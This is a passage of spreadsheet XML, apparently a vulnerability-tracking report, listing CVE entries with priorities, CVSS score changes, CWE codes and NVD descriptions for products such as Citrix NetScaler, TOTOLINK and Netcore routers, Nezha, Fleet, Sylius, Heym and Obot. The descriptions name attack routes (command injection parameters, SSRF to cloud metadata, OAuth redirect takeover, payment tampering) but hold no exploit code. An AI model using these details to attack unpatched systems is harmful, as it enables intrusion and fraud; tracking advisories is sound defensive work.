          <t>Memory overflow vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading Memory overflow vulnerability leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88775</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88776</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K155" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88776</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88777</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88777</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (10.0 → 9.3)</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100886</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Seetong T8108, T8108P, T8116 and T8232 4.6.1.4-build202604241011. The affected element is an unknown function of the component Debug Service. Such manipulation leads to improper authentication. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100886</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (10.0 → 9.3)</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101001</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Netcore NBR200V2 1.3.241127.071246. This impacts the function eval of the file /www/cgi-bin/network_tools of the component Web Management Interface. Such manipulation of the argument QUERY_STRING leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101001</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101090</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/nezhahq/nezha</t>
        </is>
      </c>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Nezha 2.2.3 contains a Host header injection regression in the OAuth2 redirect endpoint. When the new optional dashboard_host setting is empty, /api/v1/oauth2/{provider} (cmd/dashboard/controller/oauth2.go) reflects the attacker-supplied HTTP Host header into the redirect_uri sent to the identity provider instead of falling back to the configured install_host. An attacker who induces a victim to begin OAuth2 login via a request that reaches Nezha with a forged Host header can cause an attacker-controlled callback URL to be used as the redirect_uri; if the OAuth2 provider accepts it, the victim's authorization code is delivered to the attacker origin, allowing the attacker to complete the OAuth2 login/binding flow and take over the account. This regresses the fix for GHSA-9rc6-8cjv-rcvx and is configuration-dependent (dashboard_host empty). At the time of the advisory no patched version was available.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101090</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.0 → 8.9)</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101045</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Fleet-maintained app install and uninstall scripts for macOS are generated from Homebrew cask metadata. In manifests generated before 2026-08-19, the script generator escaped this metadata at some interpolation sites but not all of them, so cask metadata containing shell metacharacters (for example $(...) command substitution) could be carried into scripts that execute as root on managed macOS hosts. An attacker who could land crafted metadata in an upstream Homebrew cask — without needing any Fleet credentials — could achieve arbitrary command execution as root on managed macOS hosts that install or uninstall the affected Fleet-maintained app; exploitation required the crafted metadata to pass both upstream Homebrew cask review and Fleet's review of the automated ingestion pull request. The fix (fleetdm/fleet#51324) landed in Fleet's ingestion pipeline on 2026-08-19 so that all manifests generated on or after that date escape cask metadata at every interpolation site; because manifests are generated centrally and distributed as pre-built content, remediation applied to all deployments with no customer action, and the code fix is included in Fleet v4.92.0.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101045</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100872</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Sylius versions before 2.1.16 and 2.2.9 fail to validate payment amounts during cart recalculation, allowing unauthenticated attackers to modify order totals after gateway transaction initiation. Attackers can pay a small amount, enlarge the order after gateway capture, and have the system mark the inflated order as fully paid while the gateway captured only the original amount.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100872</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.9 → 8.6)</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100896</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in TOTOLINK N150RT 3.4.0-B20201030. The affected element is the function system of the file /boafrm/formWlSiteSurvey of the component Web Management Interface. This manipulation of the argument wlanif causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100896</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.4)</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101060</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>python-utcp versions before 1.1.4 contain a server-side request forgery vulnerability in HttpCommunicationProtocol.call_tool that validates the initial tool URL but follows HTTP redirects without re-validating the target. Attackers controlling a tool endpoint can return a 302 redirect to internal services, allowing the UTCP client to reach cloud metadata endpoints or internal HTTP services and return their response bodies to the caller.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101060</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 8.3)</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101049</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Heym before 0.0.53 fails to verify Slack request signatures when trigger nodes lack credential IDs or have empty signing secrets. Remote unauthenticated attackers can send forged Slack events to known webhook URLs to trigger workflows with the owner's credentials.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101049</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 8.3)</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101050</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Heym before 0.0.53 fails to verify the X-Telegram-Bot-Api-Secret-Token header on Telegram webhook endpoints when credential_id is absent or secret_token is empty. Remote unauthenticated attackers can post forged Telegram updates to trigger workflows with the owner's configured credentials and execute actions on attacker-supplied input.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101050</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.6 → 8.3)</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101064</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M166" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Obot before v0.23.0 contains a server-side request forgery vulnerability in remote MCP server registration that allows privileged users to specify arbitrary URLs without destination validation. Attackers with Power User or higher roles can coerce Obot to make requests to internal services and cloud metadata endpoints, reading responses in error messages to disclose sensitive credentials.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101064</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.9 → 8.2)</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100869</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Sylius versions before 2.1.16 and 2.2.9 fail to restrict payment request actions in the Shop API endpoint, allowing customers to trigger refunds on completed orders. Attackers with order tokens can submit arbitrary payment actions like refunds that payment gateways execute while Sylius maintains order as paid, causing financial loss.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100869</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 7.7)</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100908</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Eyeplus 57.0.0.0308. This affects an unknown function of the component p2pcam HTTP Parser. Such manipulation leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100908</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 7.5)</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88778</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
